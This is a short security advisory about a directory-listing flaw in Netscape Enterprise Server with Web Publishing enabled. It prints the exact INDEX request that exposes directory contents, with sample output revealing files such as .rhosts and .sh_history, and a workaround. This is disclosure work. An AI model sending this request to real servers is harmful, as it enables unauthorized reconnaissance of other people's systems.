COMMAND

    Netscape Enterprise Server

SYSTEMS AFFECTED

    Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

PROBLEM

    Following  is  based  on  a  Security  Bulletin 010124.EXP.1.11 by
    S.A.F.E.R.   Problems  exists  that  allows  remote user to obtain
    directory listings on remote site running Web Publishing.

    It  is  possible  to  obtain  directory  listing on the remote web
    server by issuing command:

        INDEX / HTTP/1.0

    Output looks like:

        Trying 192.168.1.1...
        Connected to www.example.org.
        Escape character is '^]'.
        INDEX / HTTP/1.0
        
        HTTP/1.1 200 OK
        Server: Netscape-Enterprise/3.6 SP2
        Date: Fri, 19 Jan 2001 12:37:26 GMT
        Content-type: text/plain
        
        test directory 512 979859452 0 null null
        contact directory 512 979701766 0 null null
        index.html text/html 1467 979701461 268 null null
        mobile directory 512 979701775 0 null null
        service directory 512 979701801 0 null null
        .rhosts unknown 22 965727716 264 null null
        search directory 512 931316908 0 null null
        .sh_history unknown 1256 979723453 264 null null
        corporate directory 512 972989267 0 null null
        .cshrc unknown 418 975657629 264 null null
        .login unknown 674 975657629 264 null null
        .profile unknown 416 975657629 264 null null

    INDEX request  will not  work on  'aliased' directories  (like CGI
    directories and similar).

SOLUTION

    Netscape  has  been  contacted  on  multiple  occasions  - no fix.
    Workaround is to disable Web Publishing, or disable INDEX  request
    (which will, most likely, break web publishing feature).